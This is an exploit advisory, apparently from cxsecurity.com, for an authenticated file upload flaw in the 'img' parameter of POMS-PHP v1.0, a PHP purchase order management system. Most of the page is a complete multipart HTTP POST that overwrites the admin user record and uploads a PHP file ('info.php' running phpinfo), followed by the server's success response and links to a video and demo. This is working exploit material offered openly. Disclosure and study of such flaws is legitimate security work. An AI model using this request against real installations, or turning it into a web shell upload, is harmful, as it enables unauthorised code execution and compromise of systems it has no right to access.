POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - File Upload Vulnerability exploit

2024.11.11
bg nu11secur1ty (BG) bg
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Titles: POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - File Upload Vulnerability exploit ## Author: nu11secur1ty ## Date: 11/08/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette ## Reference: https://portswigger.net/web-security/file-upload ## Description: The `img` parameter is vulnerable to File Upload vulnerability. This will make it easy for malicious for the already login users to this system to getting sensitive information, or even worse than ever, they can destroy it very easily! STATUS: HIGH- Vulnerability [+]Exploit: ``` POST /purchase_order/classes/Users.php?f=save HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=90lhc202cbb0s5adki1gd5suj0 Content-Length: 709 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130" Sec-Ch-Ua-Mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoIjZa6BqBYZRIp8V Origin: https://pwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pwnedhost.com/purchase_order/admin/?page=user Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="id" 1 ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="firstname" Adminstrator ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="lastname" Admin ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="username" admin ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="password" ------WebKitFormBoundaryoIjZa6BqBYZRIp8V Content-Disposition: form-data; name="img"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> ------WebKitFormBoundaryoIjZa6BqBYZRIp8V-- ``` [+]Response: ``` HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 08:52:20 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 1 ``` ## Reproduce: [href](https://www.youtube.com/watch?v=XODY8SSz62c) ## Demo PoC: [href](https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright_8.html) ## Time spent: 00:05:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top